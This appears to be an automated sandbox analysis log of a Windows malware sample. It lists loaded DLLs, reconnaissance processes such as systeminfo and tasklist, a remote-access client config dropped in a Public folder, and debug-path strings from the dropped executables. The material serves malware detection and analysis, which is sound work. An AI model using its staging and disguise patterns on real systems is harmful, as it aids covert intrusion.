                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
                                Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
                                Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: dxgidebug.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: sfc_os.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeSection loaded: netutils.dll
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile written: C:\Users\Public\Netstat\client32.ini
                                Source: C:\Users\Public\Netstat\FuturreApp.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: file.exeStatic file information: File size 3037184 > 1048576
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeFile opened: C:\Users\Public\Netstat\msvcr100.dll
                                Source: file.exeStatic PE information: Raw size of uyplpdnx is bigger than: 0x100000 < 0x2b3e00
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: m9sfEU9.exe, 00000051.00000000.2623878059.0000000000160000.00000002.00000001.01000000.0000001F.sdmp, m9sfEU9.exe, 00000051.00000002.2648520740.0000000000160000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: FuturreApp.exe, 00000055.00000002.7290420572.000000006C002000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: D1UL0FG.exe, 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: D1UL0FG.exe
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: FuturreApp.exe, 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, FuturreApp.exe, 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A8A22000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000063.00000002.2839636582.00007FF62B1A0000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013531293.00007FF8BFAD1000.00000040.00000001.01000000.00000014.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdbhP source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7289151898.000000006BF21000.00000020.00000001.01000000.00000026.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: D1UL0FG.exe, 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
                                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: D1UL0FG.exe, 00000005.00000003.2466075988.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3014816312.00007FF8BFBA1000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3014453254.00007FF8BFB61000.00000040.00000001.01000000.0000000D.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008792565.00007FF8B90E1000.00000040.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3013206314.00007FF8BFAB1000.00000040.00000001.01000000.00000019.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: D1UL0FG.exe, 00000006.00000002.3011719584.00007FF8B916B000.00000040.00000001.01000000.0000000F.sdmp
